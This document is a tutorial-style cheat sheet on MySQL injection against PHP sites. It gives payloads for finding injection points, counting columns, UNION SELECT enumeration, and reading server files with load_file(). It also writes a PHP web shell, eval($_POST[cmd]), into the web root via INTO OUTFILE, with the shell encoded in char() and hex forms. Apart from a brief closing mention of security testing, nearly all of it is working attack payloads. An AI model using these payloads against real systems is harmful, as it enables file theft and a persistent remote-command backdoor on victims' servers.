MySQL Injection Techniques: Detecting Vulnerabilities, Determining Field Count, Using UNION SELECT, and Exploiting load_file()

Detecting Injection: Append and 1=1 and and 1=2 to a URL parameter; differing responses indicate a possible injection point.

Determining Column Count: Use order by N incrementally (e.g., http://127.0.0.1/1.php?id=1 order by 40) until an error occurs; the last successful number reveals the column count.

Enumerating Fields with UNION SELECT: Once the column count is known, craft a UNION SELECT payload that lists dummy values for each column (e.g., union select 1,2,3,4~44) to confirm the injection works.

Common MySQL Functions: Functions such as system_user(), user(), current_user(), session_user(), database(), version(), and load_file() provide valuable information about the target system.

Using load_file() to Read Files: If the injection point has file read/write privileges, load_file() can read local files. Verify permission with and (select count(*) from mysql.user)>0. Example for Windows paths using char() encoding:

load_file(char(99,58,47,119,105,110,100,111,119,115,47,112,104,112,46,105,110,105))

reads c:/windows/php.ini. Similar examples are provided for Linux/UNIX and FreeBSD.

Bypassing Output Filtering: Replace problematic characters in the file content using replace(load_file(A),char(B),char(C)), e.g., replace(load_file(A),char(60),char(32)) to turn '<' into a space.

Partial Output with substring() : Use substring(load_file(A),50,100) to retrieve a specific segment of a large file.

Writing Files with INTO OUTFILE : Conditions required: known physical path, UNION support (MySQL 3+), no filtering of quotes, file_priv privilege, and write permission on the web directory. Example payload to write a web shell:

http://www.xxx.com/coder.php?id=1 and 1=2 union select 1,load_file('/www/home/html/upload/qingyafengping.jpg'),3,4,5,6 into outfile '/www/home/html/coder.php'

.

Alternative Payloads: When file upload is blocked, encode the web shell directly with char() or hexadecimal and write it via INTO OUTFILE, e.g.,

http://www.xxx.com/coder.php?id=1 and 1=2 union select 1,char(60,63,112,104,112,32,101,118,97,108,40,36,95,80,79,83,84,91,99,109,100,93,41,63,62),3,4,5,6 into outfile '/www/home/html/coder.php'

or using hex: 0x3C3F706870206576616C28245F504F53545B636D645D293F3E.

Conclusion: The techniques described apply to older PHP versions (≤5.6); newer versions have mitigations, but understanding these methods remains essential for security testing and defensive hardening.